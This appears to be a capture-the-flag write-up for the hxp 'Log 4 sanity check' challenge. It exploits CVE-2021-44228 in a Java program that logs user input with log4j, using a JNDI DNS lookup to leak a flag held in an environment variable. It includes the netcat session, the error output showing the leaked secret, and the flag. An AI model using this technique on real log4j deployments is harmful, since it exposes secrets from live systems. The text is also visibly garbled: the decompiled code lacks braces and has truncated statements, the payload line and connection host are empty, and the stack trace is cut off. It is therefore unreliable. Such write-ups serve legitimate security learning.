Summary: Exploit log4j vulnerability to leak environment variables.

Challenge Prompt

Log 4 sanity check
by 0xbb
misc baby
Difficulty estimate: easy - easy

Points: round(1000 · min(1, 10 / (9 + [87 solves]))) = 104 points


Log 4 sanity check-9afb8a24feb86db1.tar.xz (1.7 MiB)

Connection (mirrors):
nc 1337

Attachment: challenge file


This is a sanity check challenge and so is very easy. A Vuln.class is provided in the tar file. This is decompiled with Procyon:

import org.apache.logging.log4j.Logger;
import java.util.Scanner;
import org.apache.logging.log4j.LogManager;

// Decompiled by Procyon v0.5.36

public class Vuln
    public static void main(final String[] array) {
        try {
            final Logger logger = LogManager.getLogger((Class)Vuln.class);
            System.out.println("What is your favourite CTF?");
            final String next = new Scanner(;
            if (next.toLowerCase().contains("dragon")) {
            if (next.toLowerCase().contains("hxp")) {
            else {
                logger.error("Wrong answer: {}", (Object)next);
        catch (Exception x) {

This is trivially vulnerable to CVE-2021-44228 (not going to call it Log4Shell, that is a stupid name).

It can be seen from the Dockerfile that the FLAG environment variable contains the flag.

CMD ynetd -np y -lm -1 -lpid 64 -lt 10 -t 30 "FLAG='$(cat /flag.txt)' /home/ctf/"

We can leak this with the following string:


Using this payload leaks the flag in the error messages because the domain name ends up being too long.

nc 1337
What is your favourite CTF?
2021-12-19 21:15:06,116 main WARN Error looking up JNDI resource [dns://{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}]. javax.naming.InvalidNameException: Label exceeds 63 octets: leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}; remaining name 'leak=hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}'
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.verifyLabel(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.add(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.parse(
	at jdk.naming.dns/com.sun.jndi.dns.DnsName.<init>(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.fullyQualify(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.c_lookup(
	at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(

Flag: hxp{Phew, I am glad I code everything in PHP anyhow :) - :( :( :(}

Leave a Comment